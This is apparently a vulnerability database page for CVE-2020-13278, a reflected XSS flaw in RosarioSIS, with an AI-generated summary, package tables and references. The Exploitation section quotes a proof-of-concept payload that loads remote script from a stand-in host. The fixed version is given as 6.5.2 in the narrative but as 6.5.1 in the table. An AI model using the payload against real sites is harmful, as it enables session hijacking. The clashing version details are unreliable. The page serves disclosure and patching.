CVE-2020-13278
Description
Reflected Cross-Site Scripting vulnerability in Modules.php in RosarioSIS Student Information System < 6.5.1 allows remote attackers to execute arbitrary web script via embedding javascript or HTML tags in a GET request.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Reflected XSS in RosarioSIS Student Information System < 6.5.1 allows attackers to execute arbitrary web script via crafted GET requests to Modules.php.
Vulnerability
CVE-2020-13278 is a reflected Cross-Site Scripting (XSS) vulnerability in the RosarioSIS Student Information System, affecting versions prior to 6.5.1. The root cause lies in the PreparePHP_SELF.php component, which fails to properly URL-encode keys in GET parameters. This flaw allows an attacker to inject arbitrary JavaScript or HTML tags via a specially crafted modname parameter in the Modules.php script [1][2].
Exploitation
The attack is remotely exploitable without authentication, but requires user interaction (the victim must visit a malicious link). A proof-of-concept URL demonstrates how the attacker can break out of the existing HTML context by injecting a payload such as %22%3E%3CSCRIPT/SRC=%27http://vuln.com/xss.js%27;%3C/script%3E [3]. The vulnerability is triggered when the server reflects the unsanitized input back to the victim’s browser.
Impact
Successful exploitation can lead to session hijacking, enabling the attacker to execute arbitrary requests with the victim’s privileges (potentially admin-level access). The CVSS v3.1 vector (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) confirms low confidentiality and integrity impact, but the attack vector is network-based and can have significant consequences if an admin is targeted [1][3].
Mitigation
The issue was fixed in version 6.5.2 by applying _myURLEncode() to the key values in PreparePHP_SELF.php, as shown in the corresponding Git commit [2]. Users are strongly advised to update to RosarioSIS 6.5.2 or later. No known workarounds are documented.
References
- [1] NVD - CVE-2020-13278
- [2] GitLab Commit: Fix #282 XSS URL encode key
- [3] GitLab Issue: Reflected Cross-Site Scripting vulnerability
AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
francoisjacquet/rosariosisPackagist | < 6.5.1 | 6.5.1 |
Affected products
2- RosarioSIS/RosarioSISv5Range: =6.5.1
Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
5- github.com/advisories/GHSA-4cx9-7xqc-2jxmghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2020-13278ghsaADVISORY
- gitlab.com/francoisjacquet/rosariosis/-/commit/9cb4fec5fe177f1d3716708b46d1958eac477ebeghsax_refsource_MISCWEB
- gitlab.com/francoisjacquet/rosariosis/-/issues/282ghsax_refsource_MISCWEB
- gitlab.com/gitlab-org/cves/-/blob/master/2020/CVE-2020-13278.jsonghsax_refsource_CONFIRMWEB
News mentions
0No linked articles in our index yet.